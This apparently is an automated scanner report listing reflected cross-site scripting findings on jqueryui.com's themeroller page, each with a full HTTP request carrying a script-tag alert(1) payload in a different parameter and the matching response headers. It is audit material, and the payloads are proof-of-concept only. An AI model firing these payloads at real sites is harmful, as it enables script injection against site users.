GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0f15aa"><script>alert(1)</script>ffc4cddc3d9&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:30:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 870d8"><script>alert(1)</script>8356350c402 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0870d8"><script>alert(1)</script>8356350c402&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb024"><script>alert(1)</script>61029ab1dc6 was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0bb024"><script>alert(1)</script>61029ab1dc6&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e69a"><script>alert(1)</script>1b69ddd11c1 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=08e69a"><script>alert(1)</script>1b69ddd11c1&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a86e"><script>alert(1)</script>86153e925ae was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=03a86e"><script>alert(1)</script>86153e925ae&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:32:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2c"><script>alert(1)</script>14d61402d9b was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=06bd2c"><script>alert(1)</script>14d61402d9b&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:33:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3404"><script>alert(1)</script>60ea8a71583 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngb3404"><script>alert(1)</script>60ea8a71583&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:28:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a515b"><script>alert(1)</script>de3e563a943 was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.pnga515b"><script>alert(1)</script>de3e563a943&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2a0b"><script>alert(1)</script>4f33de6bd13 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.pngd2a0b"><script>alert(1)</script>4f33de6bd13&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfc88"><script>alert(1)</script>26ccc18bbb was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.pngcfc88"><script>alert(1)</script>26ccc18bbb&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:30:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120031
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc6ff"><script>alert(1)</script>7761c2c16e6 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.pngcc6ff"><script>alert(1)</script>7761c2c16e6&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92262"><script>alert(1)</script>3bf54c79764 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png92262"><script>alert(1)</script>3bf54c79764&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120033
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a97f7"><script>alert(1)</script>27d3858697 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.pnga97f7"><script>alert(1)</script>27d3858697&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120031
The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f48c"><script>alert(1)</script>be4bd7ca47a was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
